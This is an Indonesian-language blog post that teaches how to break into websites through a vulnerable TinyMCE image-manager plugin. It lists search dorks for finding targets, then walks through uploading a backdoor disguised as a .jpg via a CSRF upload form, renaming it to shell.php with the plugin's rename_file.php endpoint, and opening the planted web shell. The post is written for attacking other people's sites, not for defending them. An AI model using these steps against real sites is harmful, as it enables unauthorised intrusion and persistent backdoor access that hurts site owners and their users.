vulnerability TinyMce plugins image Manager


vulnerability TinyMce plugins image Manager

assalamualaikum mang , ketemu lagi dengan saya kali ini saya akan berbagi tutorial inject TinyMce plugins , meng upload file termasuk backdoor kedalam web target .

jika upload backdoor kita siapin terlebih dahulu backdoor yang telah di rename ke ekstensi .jpg 

contoh shell.jpg 

( lebih baik menggunakan uploader / mini shell , baru nanti kalo sudah tertanam , tanam ulang menggunakan shell besar )



dork :

inurl:/tinymce/plugins/image/
inurl:/tinymce/plugins/image/upload.php
inurl:/tinymce/plugins/image/uploads/

kembangin ~


exploit :

site.com/[path]/tinymce/plugins/image/upload.php


 jika muncul tulisan seperti itu kita lanjutkan ke tahap selanjutnya , jika not found cari web lain saja hehehe ,
setelah itu langsung kita pakai CSRF

CSRF ONLINE DISINI


URL isi site target nya
POST file :  upl

kunci target



pilih file backdoor kita ( berbentuk jpg )

klik upload file
file sukses ke upload dengan nama FILE-20180606-1330UMKFHD3A48ZA.jpg

kita rename file tersebut menjadi file yang ber ekstensi .php supaya menjadi backdoor lagi dengan cara sebagai berikut

/rename_file.php?current_name=file-backdoor.jpg&new_name=shell.php

contoh :

http://********.com/[path]/tinymce/plugins/image/rename_file.php?current_name=FILE-20180606-1330UMKFHD3A48ZA.jpg&new_name=shell.php



lihat URL pada gambar diatas supaya gak bingung :'v
kalo muncul text succes dan banyak seperti itu maka file kita berhasil kita rename menjadi shell.php

cara akses file yang telah di upload :


http://site.com/[path]/tinymce/plugins/image/uploads/shell.php



sekian semoga bermanfaat :v
wassalamualaikum wr.wb

thanks to ./SpecimenT Hacker Patah Hati
terinspirsi dari https://www.panel-pekok.ga/2018/06/tinymce-image-manager.html

Komentar

Postingan populer dari blog ini

Cara Menyimpan Vidio Youtube Ke Galeri

Tutorial Cara Download Video Yang Hanya Bisa Streaming

Kojima Natsuki 1st Photobook SOCO SOCO Full Scans PB